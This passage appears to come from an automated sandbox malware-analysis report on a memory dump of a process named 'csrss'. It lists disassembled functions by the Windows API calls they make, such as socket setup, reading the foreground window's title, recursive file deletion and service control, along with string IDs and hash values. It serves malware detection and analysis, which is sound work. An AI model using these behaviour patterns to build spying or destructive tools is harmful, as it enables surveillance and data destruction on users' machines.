                                                        • Part of subcall function 33D535A6: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 33D535CA
                                                        • Part of subcall function 33D535A6: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 33D535E7
                                                        • Part of subcall function 33D535A6: RegCloseKey.ADVAPI32(?), ref: 33D535F2
                                                      • StrToIntA.SHLWAPI(00000000), ref: 33D5B33C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCurrentOpenQueryValueWow64
                                                      • String ID: H#z
                                                      • API String ID: 782494840-2410801705
                                                      • Opcode ID: f0ee009faeb69731e1924ef6245d234c30adee354be22abc260e260b819487c1
                                                      • Instruction ID: 3f3c625f32b560775d5ea2b2369ef1bebd0ba50b063fb19e59990cb70902e6d7
                                                      • Opcode Fuzzy Hash: f0ee009faeb69731e1924ef6245d234c30adee354be22abc260e260b819487c1
                                                      • Instruction Fuzzy Hash: FE118C62D053409AFB00A778CC56E7F7B59AB60110F840114F552F39C2EF90184A87F2
                                                      APIs
                                                      • LCMapStringW.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,?,00000001,00000000,00000001,?,33D91F19,33D91F19,?,?), ref: 33D88C24
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: String
                                                      • String ID: LCMapStringEx
                                                      • API String ID: 2568140703-3893581201
                                                      • Opcode ID: 62169277567c329d7bf948b225c5ae6982dca8c69f46f76760dc0a5797886d7f
                                                      • Instruction ID: 3c9133a5da6014407ed99161c110c2197ebdf993f68d808bdb29e213d43ef0fc
                                                      • Opcode Fuzzy Hash: 62169277567c329d7bf948b225c5ae6982dca8c69f46f76760dc0a5797886d7f
                                                      • Instruction Fuzzy Hash: 9201E53250120DFBCF029FA0CD04DEE7FA6EF08751F054555FE1569120CA729932EB94
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Alloc
                                                      • String ID: FlsAlloc
                                                      • API String ID: 2773662609-671089009
                                                      • Opcode ID: 833b6ed345488f2fd9e5ca1a49a5a82a9bf478fde7f1a1632ce80d8ba4f5acaa
                                                      • Instruction ID: 3c8ceccfebbf1c9d7e2bb4792d5cbb339f826fd116002709fd27e0addc5c0086
                                                      • Opcode Fuzzy Hash: 833b6ed345488f2fd9e5ca1a49a5a82a9bf478fde7f1a1632ce80d8ba4f5acaa
                                                      • Instruction Fuzzy Hash: DBE02B32E01218FBD701AFB4CD04DBDBBE9CF49612B00019AFC067B200DE712D168AE5
                                                      APIs
                                                      • try_get_function.LIBVCRUNTIME ref: 33D78DA9
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: try_get_function
                                                      • String ID: FlsAlloc
                                                      • API String ID: 2742660187-671089009
                                                      • Opcode ID: 78e4060e1b7f977ed28403dc1196821376ef8083252c96c4ccba2b2b73ef33be
                                                      • Instruction ID: 273d5203e3e6e102716e46f7d62fbc4609c00b3c83dc51bc0aa3cfc97eddac01
                                                      • Opcode Fuzzy Hash: 78e4060e1b7f977ed28403dc1196821376ef8083252c96c4ccba2b2b73ef33be
                                                      • Instruction Fuzzy Hash: DED05B37E42628BB97112BE45C05BE97654CF065F3F4400E2FE187654195A5481149E5
                                                      APIs
                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 33D5B7CA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: GlobalMemoryStatus
                                                      • String ID: @
                                                      • API String ID: 1890195054-2766056989
                                                      • Opcode ID: 6f09a589f51a960399b16f6d3e0a299fd69cb0d03adb97f968b77e5dbd77da26
                                                      • Instruction ID: 6b3a900e36dea566ffd45f41c54a468d52082dd7e599cbfbddd70624b0c9a95b
                                                      • Opcode Fuzzy Hash: 6f09a589f51a960399b16f6d3e0a299fd69cb0d03adb97f968b77e5dbd77da26
                                                      • Instruction Fuzzy Hash: CED017B6802318DFC720EFA8E805A8DBBFCFB08214F00416AEC49E3700E770A8018B84
                                                      APIs
                                                        • Part of subcall function 33D8ECEC: GetOEMCP.KERNEL32(00000000,?,?,33D8EF75,?), ref: 33D8ED17
                                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,33D8EFBA,?,00000000), ref: 33D8F18D
                                                      • GetCPInfo.KERNEL32(00000000,33D8EFBA,?,?,?,33D8EFBA,?,00000000), ref: 33D8F1A0
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CodeInfoPageValid
                                                      • String ID:
                                                      • API String ID: 546120528-0
                                                      • Opcode ID: 4d9f0112b8953cecc56197db471ecd74ea007e224064bbed2e0f28554556d204
                                                      • Instruction ID: d00836a793380aa485f53ad0dcc2b3614faf1f3cc24d2a7574cf49cb56fece23
                                                      • Opcode Fuzzy Hash: 4d9f0112b8953cecc56197db471ecd74ea007e224064bbed2e0f28554556d204
                                                      • Instruction Fuzzy Hash: 2B513679D003469EE710CF75D880BAABBEDEF41700F58426ED082CF551D634B246CBA1
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CountEventTick
                                                      • String ID:
                                                      • API String ID: 180926312-0
                                                      • Opcode ID: 48bf15d75c2b3d3e3c4238b3f7c311e944d834ff7d72c92ff2ad45929410caae
                                                      • Instruction ID: e66bd88aa5feccd8c224ec503316ab8affb0b0f042bc2fcd4f4024ab2a9215fc
                                                      • Opcode Fuzzy Hash: 48bf15d75c2b3d3e3c4238b3f7c311e944d834ff7d72c92ff2ad45929410caae
                                                      • Instruction Fuzzy Hash: FD51A532A083405BDB24EB35D890AFF73E5AF95210F90492DF587979D0EF30994AC662
                                                      APIs
                                                      • GetProcAddress.KERNEL32(00000000,?,00000000,00000000,00000000,?,33D88839,00000006,FlsSetValue,33D9F160,33D9F168,00000000,00000364,?,33D882E7,00000000), ref: 33D8852A
                                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 33D88537
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: AddressProc__crt_fast_encode_pointer
                                                      • String ID:
                                                      • API String ID: 2279764990-0
                                                      • Opcode ID: 6f66eb74f6f953b77cfec11e4209bf4db97cca2d690ffa201cf22dc938874409
                                                      • Instruction ID: bdaa3923a63bd1ed628e8163871f1db676edfc02fc8c4e994d83c45514a226a9
                                                      • Opcode Fuzzy Hash: 6f66eb74f6f953b77cfec11e4209bf4db97cca2d690ffa201cf22dc938874409
                                                      • Instruction Fuzzy Hash: 3D11E97BA02625DFDB12DE2DD84095A73D5EB84A6274642A5FC55FF244EB30FC0287E0
                                                      APIs
                                                      • socket.WS2_32(00766D78,00000001,00000006), ref: 33D44852
                                                      • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,33D4530B,?,?,?,00000000,?,33D9928C,?,?,?,33D4522E), ref: 33D4488E
                                                        • Part of subcall function 33D4489E: WSAStartup.WS2_32(00000202,00000000), ref: 33D448B3
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: CreateEventStartupsocket
                                                      • String ID:
                                                      • API String ID: 1953588214-0
                                                      • Opcode ID: 7d13ef18574cc5c85d26e36573459ddda372588b0f98c9e83176a2b0d88cbc19
                                                      • Instruction ID: 01d3c397c69f3a86aff9e58858935758fa1494b2566b058a3841947526970c8e
                                                      • Opcode Fuzzy Hash: 7d13ef18574cc5c85d26e36573459ddda372588b0f98c9e83176a2b0d88cbc19
                                                      • Instruction Fuzzy Hash: 2F017CB2808B80DEE7359F39E445686BFE4AB09314F04495EF0D6A7B91E7B1A482CF50
                                                      APIs
                                                      • GetForegroundWindow.USER32 ref: 33D5BAB8
                                                      • GetWindowTextW.USER32(00000000,?,00000100), ref: 33D5BACB
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Window$ForegroundText
                                                      • String ID:
                                                      • API String ID: 29597999-0
                                                      • Opcode ID: 11b1ddb4a037d1a47dbc345e0a04de41c3af750241571e6678fdabe4f0120695
                                                      • Instruction ID: 95eaae4806e9f140b50253a2fdddaaecda6cbf8d20fc756842b287ea49c558e5
                                                      • Opcode Fuzzy Hash: 11b1ddb4a037d1a47dbc345e0a04de41c3af750241571e6678fdabe4f0120695
                                                      • Instruction Fuzzy Hash: CCE04876E1032867EB20ABA5DC8DFE5776CEB08710F040199B519D71C1EDB06954C7F1
                                                      APIs
                                                        • Part of subcall function 33D78D94: try_get_function.LIBVCRUNTIME ref: 33D78DA9
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 33D7A40A
                                                      • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 33D7A415
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                      • String ID:
                                                      • API String ID: 806969131-0
                                                      • Opcode ID: 5aa1ec15e9923afb846d75440f968ab1f9978f656332de0529250a3f652a03e7
                                                      • Instruction ID: 573b0b8e26de5f1ee884eb161a87abb110965ca1f034a4ef3b3f6a2f039d2fdb
                                                      • Opcode Fuzzy Hash: 5aa1ec15e9923afb846d75440f968ab1f9978f656332de0529250a3f652a03e7
                                                      • Instruction Fuzzy Hash: C8D0222BC08310ACAC041FB8EC0D58B13986F025FD3A002EAE77C8ABC2FF1380066432
                                                      APIs
                                                      • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 33D4DB9A
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: LongNamePath
                                                      • String ID:
                                                      • API String ID: 82841172-0
                                                      • Opcode ID: 5e2231fa6db38751de4d05bdc9b498049db5c63e65ff29ebde53e2bffef8892b
                                                      • Instruction ID: 2aa6ef8134b2d923b3a7dbdb988aad21de4547959f77ce1024a998d89afe4bf3
                                                      • Opcode Fuzzy Hash: 5e2231fa6db38751de4d05bdc9b498049db5c63e65ff29ebde53e2bffef8892b
                                                      • Instruction Fuzzy Hash: 6E4142328083019FD615DB75DD50CAFB7F8AFE0250F10452EB196928A2FF609E4ECA72
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: __alldvrm
                                                      • String ID:
                                                      • API String ID: 65215352-0
                                                      • Opcode ID: 62a6ef1214a1767398b4016fe5047ff84c08a34b6a66d653e7f9d22703dfeede
                                                      • Instruction ID: f1e0db3e3d3fef603cf97c7bffeccabee0b60a79ab3061a5983faecf8a2eb72a
                                                      • Opcode Fuzzy Hash: 62a6ef1214a1767398b4016fe5047ff84c08a34b6a66d653e7f9d22703dfeede
                                                      • Instruction Fuzzy Hash: 3101D4B1911358FFEB14CF64C941BAEB7ECFF00729F10856DE445AB600D672A940C7A0
                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 33D86169
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 704b81ef18003e25cfd0742a813c0202ba853fe0b55a21afa0d6fbac2c17706a
                                                      • Instruction ID: 741eed7fc8d5700051b2b762a217ad3174410846fd89246506357365e282615b
                                                      • Opcode Fuzzy Hash: 704b81ef18003e25cfd0742a813c0202ba853fe0b55a21afa0d6fbac2c17706a
                                                      • Instruction Fuzzy Hash: 47E06DBA50132DB6E71226669C04B4B779E9F41BF2F490121EED4AE48BDE20F80582F0
                                                      APIs
                                                      • NtdllDefWindowProc_A.NTDLL(?,00000401,?,?), ref: 33D5D5DA
                                                      • GetCursorPos.USER32(?), ref: 33D5D5E9
                                                      • SetForegroundWindow.USER32(?), ref: 33D5D5F2
                                                      • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 33D5D60C
                                                      • Shell_NotifyIcon.SHELL32(00000002,33DB4B48), ref: 33D5D65D
                                                      • ExitProcess.KERNEL32 ref: 33D5D665
                                                      • CreatePopupMenu.USER32 ref: 33D5D66B
                                                      • AppendMenuA.USER32(00000000,00000000,00000000,33DACF4C), ref: 33D5D680
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyNtdllProc_ProcessShell_Track
                                                      • String ID:
                                                      • API String ID: 1665278180-0
                                                      • Opcode ID: 0d5d7f4e51fe046f8f83683dd149ac9b17d0e437570d6768a2e2a972cb0d2efa
                                                      • Instruction ID: f82cbba4e4ae452606bdeeff0d54aa9aef7371da7eede5e9ead1e41df485059a
                                                      • Opcode Fuzzy Hash: 0d5d7f4e51fe046f8f83683dd149ac9b17d0e437570d6768a2e2a972cb0d2efa
                                                      • Instruction Fuzzy Hash: 2421F8B6501209FFEF06BFA4CD0EE693FB5FB08741F410114F606A50A4DB729962DB68
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 33D5C2EC
                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 33D5C31C
                                                      • SetFileAttributesW.KERNEL32(?,00000080), ref: 33D5C38E
                                                      • DeleteFileW.KERNEL32(?), ref: 33D5C39B
                                                        • Part of subcall function 33D5C291: RemoveDirectoryW.KERNEL32(?), ref: 33D5C371
                                                      • GetLastError.KERNEL32 ref: 33D5C3BC
                                                      • FindClose.KERNEL32(00000000), ref: 33D5C3D2
                                                      • RemoveDirectoryW.KERNEL32(00000000), ref: 33D5C3D9
                                                      • FindClose.KERNEL32(00000000), ref: 33D5C3E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                      • String ID: @{t
                                                      • API String ID: 2341273852-343425482
                                                      • Opcode ID: 54de38234361651e0b55d4a02276043d5142e6b9acffc67906859544262a1d3e
                                                      • Instruction ID: 0a8f688fa44c4c5a132872c1c58cd0bb88becca2dd6d66853f47cfdca5327454
                                                      • Opcode Fuzzy Hash: 54de38234361651e0b55d4a02276043d5142e6b9acffc67906859544262a1d3e
                                                      • Instruction Fuzzy Hash: B93150B6C0131C9AFF60EBB0CC88EDA77ACAF19210F8406A5F555E7051EF3197998B60
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 0$1$2$3$4$5$6$7
                                                      • API String ID: 0-3177665633
                                                      • Opcode ID: 3a737457222483e27af2b00244548c5d3010bfd223755d08a79cfe8c6b547bb1
                                                      • Instruction ID: 8c8da067262db9ec79e6ffa02bc04bd0587cd0f1289646cc784b4cf0da404094
                                                      • Opcode Fuzzy Hash: 3a737457222483e27af2b00244548c5d3010bfd223755d08a79cfe8c6b547bb1
                                                      • Instruction Fuzzy Hash: F671D0B09083019FE704CF20D8A0BAABBE9AF95750F04491DF596576D0EF74AB4DC7A2
                                                      APIs
                                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,33DB58E8), ref: 33D5A75E
                                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 33D5A7AD
                                                      • GetLastError.KERNEL32 ref: 33D5A7BB
                                                      • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 33D5A7F3
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                      • String ID:
                                                      • API String ID: 3587775597-0
                                                      • Opcode ID: 7c6eaa7d91928d6d24bae3f762bf809297a58fa69b2e9ce767f94f9ae5572368
                                                      • Instruction ID: 36f4dbd14c9397ef8cca71b38586835e70cd02eb9b221134e904f6103f3f6dd6
                                                      • Opcode Fuzzy Hash: 7c6eaa7d91928d6d24bae3f762bf809297a58fa69b2e9ce767f94f9ae5572368
                                                      • Instruction Fuzzy Hash: 29816172808305AFD704DF61C894D9FB7E8FF94254F50491DF58692950EF70EA49CBA2
                                                      APIs
                                                      • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 33D53417
                                                      • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 33D53425
                                                      • GetFileSize.KERNEL32(?,00000000), ref: 33D53432
                                                      • UnmapViewOfFile.KERNEL32(00000000), ref: 33D53452
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: File$View$CreateMappingSizeUnmap
                                                      • String ID:
                                                      • API String ID: 2708475042-0
                                                      • Opcode ID: 0d8f92a62166b15e71f4db8d982a2f9c84fa0b8b908fd7e60fb61fabf9c77793
                                                      • Instruction ID: 7f492be6a8a7c31eaf66069feb21b56be356125ae08dc9888024d1dc43fdaf8f
                                                      • Opcode Fuzzy Hash: 0d8f92a62166b15e71f4db8d982a2f9c84fa0b8b908fd7e60fb61fabf9c77793
                                                      • Instruction Fuzzy Hash: 8041CD72A08300BBFB11AF25DC49F1B7AACEF89764F180A19F695E6490EF30C505C672
                                                      APIs
                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 33D4BBAF
                                                      • FindClose.KERNEL32(00000000), ref: 33D4BBC9
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 33D4BCEC
                                                      • FindClose.KERNEL32(00000000), ref: 33D4BD12
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFile$FirstNext
                                                      • String ID:
                                                      • API String ID: 1164774033-0
                                                      • Opcode ID: 1dfbc84fc80e710ba7d06bdb2ffa71ac347c95d8da5668e62a6f4dbdb97cea72
                                                      • Instruction ID: 5f31886de719ddc37a33a6bba9a7a078b7e0038dda410273459c94405c714c94
                                                      • Opcode Fuzzy Hash: 1dfbc84fc80e710ba7d06bdb2ffa71ac347c95d8da5668e62a6f4dbdb97cea72
                                                      • Instruction Fuzzy Hash: 5B514C32D003199FDB14EBB5DD94DEDB778BF10200F904169E417A6892FF305A8ACEA1
                                                      APIs
                                                      • FindFirstFileA.KERNEL32(00000000,?,00000000), ref: 33D4BDAF
                                                      • FindClose.KERNEL32(00000000), ref: 33D4BDC9
                                                      • FindNextFileA.KERNEL32(00000000,?), ref: 33D4BE89
                                                      • FindClose.KERNEL32(00000000), ref: 33D4BEAF
                                                      • FindClose.KERNEL32(00000000), ref: 33D4BED0
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Find$Close$File$FirstNext
                                                      • String ID:
                                                      • API String ID: 3527384056-0
                                                      • Opcode ID: fd698a8065435f202077a5e53dcb27bf406a90bb9483a4d194197c94b6cc8d19
                                                      • Instruction ID: 187bcad064b86abcd8db8034e204dfdb27cc251c3e013c9af4b3320cd5763b30
                                                      • Opcode Fuzzy Hash: fd698a8065435f202077a5e53dcb27bf406a90bb9483a4d194197c94b6cc8d19
                                                      • Instruction Fuzzy Hash: 5D418132D04319AEDB04EBB5DD54CEDB7B8EF25210F800169E456A78C1FF315A9ACBA1
                                                      APIs
                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011), ref: 33D5AB1C
                                                      • OpenServiceW.ADVAPI32(00000000,00000000,000F003F), ref: 33D5AB33
                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 33D5AB40
                                                      • ControlService.ADVAPI32(00000000,00000001,?), ref: 33D5AB4F
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D41000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D41000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d41000_csrss.jbxd
                                                      Similarity
                                                      • API ID: Service$Open$CloseControlHandleManager
                                                      • String ID:
                                                      • API String ID: 1243734080-0
                                                      • Opcode ID: d3270f6379caeff59afdca76f9091fb777f4d206e56cc0288398da99998ba870
                                                      • Instruction ID: 3adb4a466221cc5ae469d30b344d73beba63d9acb27d7660a0d276557d68f116
                                                      • Opcode Fuzzy Hash: d3270f6379caeff59afdca76f9091fb777f4d206e56cc0288398da99998ba870
                                                      • Instruction Fuzzy Hash: B611A1769502286FFB22BB64CCC9DFF3BADDB466A1B010015F92AE2140DB744D479AF1
                                                      APIs
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,33D9275B,?,00000000), ref: 33D924D5
                                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,33D9275B,?,00000000), ref: 33D924FE
                                                      • GetACP.KERNEL32(?,?,33D9275B,?,00000000), ref: 33D92513
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: InfoLocale
                                                      • String ID: ACP$OCP
                                                      • API String ID: 2299586839-711371036
                                                      • Opcode ID: 79dde2b064d1341029c78c05f0c13395a24529796036acb3d698bb31393af23a
                                                      • Instruction ID: d05fe9d38238ad89c570ea37029cc09c8dd16c4a4aea8351b3e8af7d9e2187b1
                                                      • Opcode Fuzzy Hash: 79dde2b064d1341029c78c05f0c13395a24529796036acb3d698bb31393af23a
                                                      • Instruction Fuzzy Hash: 5E21D77A600209E7F3E4DF74CD01ACB73AAEF54FA4B8A8524E949DB104E732DA40C390
                                                      APIs
                                                        • Part of subcall function 33D88215: GetLastError.KERNEL32(?,?,33D85591,33DAEA10,0000000C,33D74B93), ref: 33D88219
                                                        • Part of subcall function 33D88215: _free.LIBCMT ref: 33D8824C
                                                        • Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D8828D
                                                        • Part of subcall function 33D88215: _abort.LIBCMT ref: 33D88293
                                                        • Part of subcall function 33D88215: _free.LIBCMT ref: 33D88274
                                                        • Part of subcall function 33D88215: SetLastError.KERNEL32(00000000), ref: 33D88281
                                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 33D9271C
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 33D92777
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 33D92786
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,33D84A6C,00000040,?,33D84B8C,00000055,00000000,?,?,00000055,00000000), ref: 33D927CE
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,33D84AEC,00000040), ref: 33D927ED
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                      • String ID:
                                                      • API String ID: 745075371-0
                                                      • Opcode ID: ac61275cae35f1543ada33f09e8cdfdd5d98a8b9486cec7dac17b2c8ff7054e1
                                                      • Instruction ID: be1affdd987c04aa3443927f717f57f8b7d298217313759f3d8e43359c0b40aa
                                                      • Opcode Fuzzy Hash: ac61275cae35f1543ada33f09e8cdfdd5d98a8b9486cec7dac17b2c8ff7054e1
                                                      • Instruction Fuzzy Hash: A8518FB6E0020DABFF50DFA4DC80AFE77B8AF18741F540469E954FB190EB709A458B61
                                                      APIs
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,33D9F234), ref: 33D893CF
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,33DB2764,000000FF,00000000,0000003F,00000000,?,?), ref: 33D89447
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,33DB27B8,000000FF,?,0000003F,00000000,?), ref: 33D89474
                                                      • _free.LIBCMT ref: 33D893BD
                                                        • Part of subcall function 33D86782: HeapFree.KERNEL32(00000000,00000000), ref: 33D86798
                                                        • Part of subcall function 33D86782: GetLastError.KERNEL32(?,?,33D90C6F,?,00000000,?,00000000,?,33D90F13,?,00000007,?,?,33D9145E,?,?), ref: 33D867AA
                                                      • _free.LIBCMT ref: 33D89589
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1012207860.0000000033D6F000.00000040.00000800.00020000.00000000.sdmp, Offset: 33D6F000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_33d6f000_csrss.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                      • String ID:
                                                      • API String ID: 1286116820-0
                                                      • Opcode ID: 29d18a31a9c5dc9ad18af58bc9a40c416a579766ac18fa77714bb489c60fd35b
                                                      • Instruction ID: 08da55867b3a49d19b2f01581789c378831af32e0e9cad237d9c7ffdc5fedc44
